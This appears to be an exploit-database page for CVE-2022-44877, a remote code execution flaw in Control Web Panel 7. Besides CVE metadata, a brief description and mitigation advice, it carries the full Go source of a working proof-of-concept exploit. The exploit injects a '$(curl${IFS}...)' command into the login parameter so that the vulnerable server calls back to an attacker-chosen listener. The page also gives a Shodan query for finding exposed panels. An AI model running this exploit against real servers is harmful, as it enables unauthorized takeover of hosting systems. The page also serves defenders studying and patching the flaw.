header-logo
Suggest Exploit
vendor:
Control Web Panel (CWP)
by:
Mayank Deshmukh
9.8
CVSS
CRITICAL
Remote Code Execution (RCE)
78
CWE
Product Name: Control Web Panel (CWP)
Affected Version From: version < 0.9.8.1147
Affected Version To:
Patch Exists: YES
Related CWE: CVE-2022-44877
CPE: a:control_web_panel:control_web_panel:0.9.8.1147
Metasploit:
Other Scripts:
Tags: packetstorm,cve,cve2022,centos,rce,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://twitter.com/_0xf4n9x_/status/1612068225046675457https://github.com/numanturle/CVE-2022-44877https://gist.github.com/numanturle/c1e82c47f4cba24cff214e904c227386https://nvd.nist.gov/vuln/detail/CVE-2022-44877http://packetstormsecurity.com/files/171725/Control-Web-Panel-7-CWP7-0.9.8.1147-Remote-Code-Execution.html
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.title:"Login | Control WebPanel"', 'verified': True, 'vendor': 'control-webpanel', 'product': 'webpanel'}
Platforms Tested: Kali Linux
2023

Control Web Panel 7 (CWP7) v0.9.8.1147 – Remote Code Execution (RCE)

This exploit allows an attacker to execute arbitrary code on a vulnerable Control Web Panel (CWP) version 0.9.8.1147 and below. By sending a specially crafted request to the /login/index.php endpoint, the attacker can inject a malicious cURL command that will be executed by the server. This can lead to unauthorized access, data leakage, and further compromise of the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Control Web Panel (CWP) which has addressed this issue. Additionally, it is advised to implement proper input validation and sanitization to prevent command injection attacks.
Source

Exploit-DB raw data:

// Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 -  Remote Code Execution (RCE)
// Date: 2023-02-02
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://centos-webpanel.com/
// Affected Versions: version < 0.9.8.1147
// Tested on: Kali Linux
// CVE : CVE-2022-44877
// Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7

// Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020

package main

import (
    "bytes"
    "crypto/tls"
    "fmt"
    "net/http"
    "flag"
    "time"
)

func main() {

    var host,call string
    flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)")
    flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)")

    flag.Parse()

    banner := `
-= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =-
- by Mayank Deshmukh (ColdFusionX)

`
     fmt.Printf(banner)
     fmt.Println("[*] Triggering cURL command")

     fmt.Println("[*] Open Listener on " + call + "")

    //Skip certificate validation
    tr := &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
    }
    client := &http.Client{Transport: tr}

    // Request URL
    url := host + "/login/index.php?login=$(curl${IFS}" + call + ")"

    // Request body
    body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login"))

    // Create HTTP client and send POST request
    req, err := http.NewRequest("POST", url, body)
    req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
    resp, err := client.Do(req)
    if err != nil {
        fmt.Println("Error sending request:", err)
        return
    }
    time.Sleep(2 * time.Second)

    defer resp.Body.Close()
    fmt.Println("\n[*] Check Listener for OOB callback")
}

Navigation

Suggest Exploit

Services By CQR